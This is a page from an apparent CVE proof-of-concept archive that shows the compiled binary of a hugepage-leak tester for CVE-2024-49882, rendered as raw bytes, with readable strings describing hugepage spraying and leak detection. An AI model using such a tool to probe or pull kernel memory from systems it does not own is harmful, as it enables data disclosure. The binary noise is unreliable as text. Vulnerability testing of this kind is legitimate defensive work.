4837 Total CVEs
26 Years
GitHub
Home / 2024 / CVE-2024-49882
README.md
Rendering markdown...
POC / test_hugepage_leak
⬇ Raw GitHub ✕ Close 
ELF>�@�g@8
@'&@@@��		��   ��`-`=`=��p-p=p=��88800hhhDDS�td88800P�td�'�'�'44Q�tdR�td`-`=`=��/lib64/ld-linux-x86-64.so.2 GNU���GNU��3��_�%ۑ�$`A�ƿ�!�GNU��e�mO�� $y��� 4;A
 pa"puts__stack_chk_fail__printf_chk__isoc23_fscanfmunmapfopen__fprintf_chk__libc_start_main__cxa_finalizestrerrorfclosememset__errno_locationmmaplibc.so.6GLIBC_2.3.4GLIBC_2.4GLIBC_2.38GLIBC_2.2.5GLIBC_2.34_ITM_deregisterTMCloneTable__gmon_start___ITM_registerTMCloneTable�ti	�ii
�����ui	�����`=�h=P@@�?�?�?
�?�?x?�?�?�?�?�?�?	�?�?�?
�?�?��H��H��/H��t��H����5B/�%D/@��h���f���h����f���h����f���h���f���h���f���h���f���h���f���h�r���f���h�b���f���h	�R���f���h
�B���f���h�2���f����%�.fD���%n.fD���%f.fD���%^.fD���%V.fD���%N.fD���%F.fD���%>.fD���%6.fD���%..fD���%&.fD���%.fD���%.fD��AWAVAUATUSL��$���H��H�$L9�u�H��xH�=�L�%H�-�dH�%(H��$h^1�����H�=~���H�=����L��H���R���H��tFH�T$H�5�
H��H��1����H�������T$1��H�5r�����|$���L��H�����H��H��t5H�T$H�5r
H��1��^���H���v����T$�1�H�5t�����H�5�1�1�E1�H��$����f.�1�E1�A������"�� �1���H��H��H���t%��� A��Hi�O��NH��#k�)ƃ�A����H��H���u�1�D��H�51����A��	���2H�5�1�1����1�D�d$�D$DE1�1�A������"�� A�����H����<H��H��H��H�QwUZ���H�� H1�L�BfDH�H��H��I9�u�L�d$ M��L��f.�H�1H��H��H�r�H9�u� H���,���E1�A�����1��"�� ���I��H�����H��1�I�>1�H98@��I��H�I9�u�I����~��H��H9��AH�:t�H��vAi�������=���wH�
�D��H�5Q�1����� L���u���H��H��2�����D�d$H�=K����Ic�H�,��H�;H���t
� �5���H��H9�u�H�==H������H�=�
���H�����D��1�H�5�
����2H�5�
1�����D�|$1�H�5�
�D������E���_H�=T�W���H�=��K���H���C���1��|$��H��$h^dH+%(��H��x^[]A\A]A^A_�H���������8�����H�5\H��1�H���>����a���f�H�������D��H�5\1�H��������/����D��H�5f�1����H�=�	�D$E1��v���L�5W	L��O��D��H��L�
9	H�5VI�L9�ME��1�I�����I��u����H��vAi�������=�������H�
����H�=]	���H�=Q������H�=�����H�=���������H�=����H�5�H������H��H������H�ǹ�H��1������H���������������1�I��^H��H���PTE1�1�H�=��(�f.�H�=)(H�"(H9�tH��'H��t	�����H�=�'H�5�'H)�H��H��?H��H�H�tH��'H��t��fD�����=�'u+UH�=�'H��tH�=�'�y����d�����']������w�����H��H���✓✗Page zeroedr%dw     Leaked values:[%d] %s
RESULTS  Spray pages:  %d
  Iterations:   %d
  Leaks found:  %d

  No direct leaks detected.Page has OTHER data (possible leak from spray)╔══════════════════════════════════════════════════════════════╗║  CVE-2024-49882 Hugepage Leak Test (with spraying)           ║╚══════════════════════════════════════════════════════════════╝
/sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages[Info] Hugepages configured: %d
[Info] Increasing hugepage pool for spraying...[Info] Hugepages available: %d

[Spray] Allocating %d hugepages to exhaust zeroed pool...
[Spray] Allocated %d hugepages
[Error] Could not allocate enough hugepages for spraying        Try: echo 200 | sudo tee /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages[Test] Running %d iterations with spray active...

[%d] Failed to allocate first hugepage: %s
[%d] Failed to allocate second hugepage
[%d] *** LEAK DETECTED! %d/16 patterns found ***
       Offset 0x%x: 0x%016lx (expected 0x%016lx) %s

[Cleanup] Releasing spray pages...
════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════
  *** KERNEL IS VULNERABLE TO CVE-2024-49882 ***  Hugepages are NOT being zeroed on release!  Try increasing spray count or hugepage pool.;4p�h@��P�����PzRx���&D$4��FJw�?9*3$"\��t���T�H��F�B�B �B(�A0�A8�H��Q
G��
8A0A(B BBBA�P�
�`=h=���o���
$`? �0�	���o���o����o�o����op=0@P`p�������@GCC: (Ubuntu 13.3.0-6ubuntu2~24.04) 13.3.0,�� <9o�6	|	�!	d	#	f	e"int	�-6�i��i�	m#�$C�1�3b�6	��7	�D8	��9	� �:	�(�;	�0�<	�8�=	�@X@	�HA	�PXB	�X�D(`F-h�Hbp0IbtJ|x/MM�UNT��O2��QB�"Y
��;[L�\V��]-��^	D��_
*�`b��b[�G�%�+�#��B68G�Q�k6�ku	�	w
p�*	4b�bkf	1b�zbp)
Lb�D*���b&%
b�
9DLD*bbb|��bbu'��b�zpu�pp(�b���rbP�,()	b27	bND���~L	b��f#u���nr%b���~
[Ojw,u_[[+
�n*(g�U	#|��.0�><�XT��UsT2Q	h R
�
v�UUvT	 �LUs_dd(	�nnl{�U2T	�"
\b�UsT	 Q���~dLUs
�5�nr6b���~_��9	un����U2T	@#
�b�UsT	 Q���~�LUs
�h�iAb��+,>F
OR��F��:��Q�Tvv����O��N#%J#AQ@A$U0T@A$Q3R"X	�Y0QniTb$*j�VDqmp^��C_����e���~nD!p2v�w
b]W
�2@j`b�z
 _jfb
x~jyb
�L�j�b��+_���n����U2T	(%Q}<$�w	v�b��� 	j�b,_���n����U2T	3 Qv_7�Y�	n
B�U2T	�$Q}_Z�q
n'%t�U2T	�$Q}_���
j
n?=��U2T	�$Qv_���
�
nWU��U	 
��
U0T@A$Q3R"X	�Y0
D��
T@A$
c3U0T@A$Q3R"X	�Y0
��RUT@A$&�
*�i�bqi;�T@A$_�n���U	� _:n��'�U	�!_'' �n��3�U	�!_�.?�n����U2T	`#Q
�_^^J/
n	t�U2T	�#Q|_~~R�
n#!��U2T	X$Q2_	��
n;9�U	`%_D�nOMW�U	�%_c)�Gncak�Us_WW��nwuc�U	< _kk��n����U2T	D Q|_���Gn����U2T	X Q2_����n����U2T	l Q_���	�n����U	'_���	<n����U	P'_����n����Us_�	�n
(�U	� _((�	n#!4�U	�'_99M	mn75E�U	�#_EEN	�nKIQ�U	$
>��UvT|
���UvT|�D-6���+69D_(9D9bR9*<Tb|6T p;Mb��Mz6M<p3�1[Info] Increasing hugepage pool for spraying...
���     Leaked values:
���╔══════════════════════════════════════════════════════════════╗
H�F║  CVE-2024-49882 Hugepage Leak Test (with spraying)           ║
���╚══════════════════════════════════════════════════════════════╝

'�%
[Cleanup] Releasing spray pages...
���
════════════════════════════════════════════════════════════════
���════════════════════════════════════════════════════════════════
�	RESULTS
5�3
  *** KERNEL IS VULNERABLE TO CVE-2024-49882 ***
0�.  Hugepages are NOT being zeroed on release!
 �
  No direct leaks detected.
2�0  Try increasing spray count or hugepage pool.
<�:[Error] Could not allocate enough hugepages for spraying
[�Y        Try: echo 200 | sudo tee /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages
.ttI~H}1�B
:!;9I81R�BX!YWI6!I	$>
H}1R�BUX!YW4:!;9I�B
4:!;9I�B:;9I:;9I.?:;9'I<IU4:!;9I<!I/H}.?:;9!'I !47I.?:;9!'I<:!;!9I�B4:!;9I4:!;9!
I.?<n:!
;! %U!"$>#&I$:;9%:;9&.?:;9'I<'.?:;9n'I<(.?:;9'I@z)4:;9I*U+1R�BUXYW,1R�BXYW-!I/..?<n �
Il�����	!(7ELU]h	�
>.tMu�/6
XI5
�J4
�M�	Z.Y�,
f	T�
	�	YY�
fi
	FJ
:�Xk
	��	L>
hs..
u.X.I
�
u<X
'zJ�	

Xv�
�
	F�.	�X<�	�	Z	�	�
�";%
";�"I	]�	"
�[��",	^t&��f
f��t
X	��+�J
��X�
��
	�<
g'�J^�
�X��
���
���
X��
t��
��	��
�	��
���
�� �
�)�[X
q�7
,
LX+
��c
�
L�+
,�T
<.
+P
+t
UX�
/t5<H
P<2XH
Pt2tHNt0
P</.
QJX%/�
��tX	�
�	��
�X	w
�	x
�	y
\�)
�
V
!�
�`��_chain__errno_locationfopen_old_offset__printf_chkleaks_found_IO_FILEspray_count_IO_save_endshort intsize_thas_data__chmain_IO_write_ptr_flags_IO_buf_base_lock_markersstrerrorwritten_values_freeres_bufpage1matcheslong long int__isoc23_fscanf__builtin_memsetspray_pages__dest_cur_columnfprintfunique_magicargv_vtable_offsetunsigned charargclong long unsigned int_IO_marker_shortbuf_IO_read_end_IO_write_base_unused2_IO_read_ptr_IO_buf_endmmap_freeres_listfclose__pad5page2__uint64_ttest_iterationsshort unsigned int__fmtGNU C17 13.3.0 -mtune=generic -march=x86-64 -g -O2 -fasynchronous-unwind-tables -fstack-protector-strong -fstack-clash-protection -fcf-protection_IO_write_end__off64_t_fileno__builtin_puts_IO_wide_data_mode__off_t_IO_backup_basemunmap_flags2_IO_codecvt_IO_read_base__len_IO_save_base__fprintf_chk__stack_chk_fail__stream_IO_lock_ttest_hugepage_leak.c/home/vlad/Desktop/convert_channel_bug_exploitation/usr/include/x86_64-linux-gnu/bits/usr/lib/gcc/x86_64-linux-gnu/13/include/usr/include/x86_64-linux-gnu/bits/types/usr/include/x86_64-linux-gnu/sys/usr/includestdio2.hstring_fortified.hstddef.htypes.hstruct_FILE.hstdint-uintn.hstdio2-decl.hmman.hstring.hstdio.h<built-in>errno.hY�5U5��U��ZTZ��T��0������~��	���~�	�
���~�
�0��0���\��|���\�����~��
���~�
�
\�
�0�>PKSYoPo�S�
�
SyP1S[���
h ��PSd
�"��
@#��0�[V[_v�_�V��V,%@A$�,%vJ#A�,P$U�0�-�V��v���V��V��]��V��]��V�yP��P�oP�QUxp�U�v $�������L'���v $�������L'���v $�������L'���v $�������L'�fP?Q?�_��P��_��Q��_ucR��R��R�
0�
�1���1��0�<]<A}��
(%��1���0��
3 �7
�$�Z
�$�y
�$����0�!s�#��3%�!%s�#��3%#�%8s�#��3%#����'��%
`#�^
�#�~
X$���D�	c��W��k
D ��
X ��
l �����������(�29�fE��A�(-CF�
�
� %,	 %������������������������&Z��""%'+0	DK ���	� �(�3�5HP^@jh=���`=(���(��p=��'�`?�6 � @Rm~@�������@� �@ @��&@&9��>Wi@u� ��"�Scrt1.o__abi_tagtest_hugepage_leak.ccrtstuff.cderegister_tm_clones__do_global_dtors_auxcompleted.0__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entry__FRAME_END___DYNAMIC__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_start_main@GLIBC_2.34__errno_location@GLIBC_2.2.5_ITM_deregisterTMCloneTable__isoc23_fscanf@GLIBC_2.38puts@GLIBC_2.2.5_edatafclose@GLIBC_2.2.5_fini__stack_chk_fail@GLIBC_2.4mmap@GLIBC_2.2.5memset@GLIBC_2.2.5__data_start__gmon_start____dso_handle_IO_stdin_used_end__bss_startmunmap@GLIBC_2.2.5main__printf_chk@GLIBC_2.3.4fopen@GLIBC_2.2.5__TMC_END____fprintf_chk@GLIBC_2.3.4_ITM_registerTMCloneTablestrerror@GLIBC_2.2.5__cxa_finalize@GLIBC_2.2.5_init.symtab.strtab.shstrtab.interp.note.gnu.property.note.gnu.build-id.note.ABI-tag.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.plt.sec.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.dynamic.data.bss.comment.debug_aranges.debug_info.debug_abbrev.debug_line.debug_str.debug_line_str.debug_loclists.debug_rnglists#8806hh$I�� W���o��$a���i��$q���o��$~���o��`�00��B�� ��  �������������
�  ���'�'4��'�'��`=`-�h=h-�p=p-��`?`/�@0@000+;00)k05vH�C&K$O0JR�Z0�UpjSW]z�]E�^h%	`c�?f�